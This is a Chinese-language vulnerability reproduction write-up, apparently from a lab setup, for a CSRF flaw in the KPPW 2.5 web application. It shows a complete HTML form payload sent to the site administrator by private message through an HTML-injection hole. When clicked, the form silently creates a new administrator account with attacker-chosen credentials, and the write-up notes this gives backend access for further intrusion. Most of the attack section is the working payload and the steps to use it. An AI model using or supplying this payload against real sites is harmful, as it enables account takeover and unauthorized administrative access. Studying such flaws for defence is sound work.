kppw2.5 CSRF漏洞复现
漏洞说明
http://192.168.50.157/kppw25/index.php?do=user&view=message&op=send
收件人填目标用户名,标题随便,内容没有转义 ,所以提交内容处可能存在xss,不过过滤了敏感标签和 onerror onload等事件。虽然不能加载js代码,但是还是可以注入html代码,可以用xss漏洞注入html代码触发csrf
漏洞利用
http://192.168.50.157/kppw25/index.php?do=user&view=message&op=send
收件人填写admin(网站管理员),向管理员提交私信,内容为我们构造的html代码
<form action="http://192.168.50.157/kppw25/admin/index.php?do=user&view=add&edituid=
" method="post">
<input type=hidden name="edituid" value="">
<input type=hidden name="fds[username]" value="qianlan">
<input type=hidden name="fds[truename]" value="">
<input type=hidden name="fds[phone]" value="">
<input type=hidden name="fds[qq]" value="">
<input type=hidden name="fds[indus_pid]" value="">
<input type=hidden name="fds[indus_id]" value="">
<input type=hidden name="fds[birthday]" value="">
<input type=hidden name="fds[password]" value="newadmin">
<input type=hidden name="fds[email]" value="x@q.c">
<input type=hidden name="fds[group_id]" value="1">
<input type="submit" name="is_submit" value="1">
</form>
http://192.168.50.157/kppw25/admin/index.php?do=user&view=add&edituid=这个url是后台管理员添加用户的url,我们构造表单,action的值设为这个url,写几个隐藏表单诱使管理员去点击提交,就会以管理员的身份去添加一个新的管理员,当然这不是网站管理员的意愿,而是我们的
提交完成后退出当前网站用户,模拟管理员登陆查看私信,可以看到一个按钮,单单一个按钮,看到的人总会想着去点一下,当然这个按钮可以构造的更具有吸引力
当点击按钮过后,管理员就会在不知情的情况下发起添加用户的http请求去添加一个用户名为qianlan密码为newadmin的用户,当然这是我们构造的,看用户列表可以看到多了一个名为qianlan的用户,我们登陆一下可以成功进入后台,进行下一步的渗透
参考链接(http://lawlietweb.com/2018/01/12/KPPW25xss/)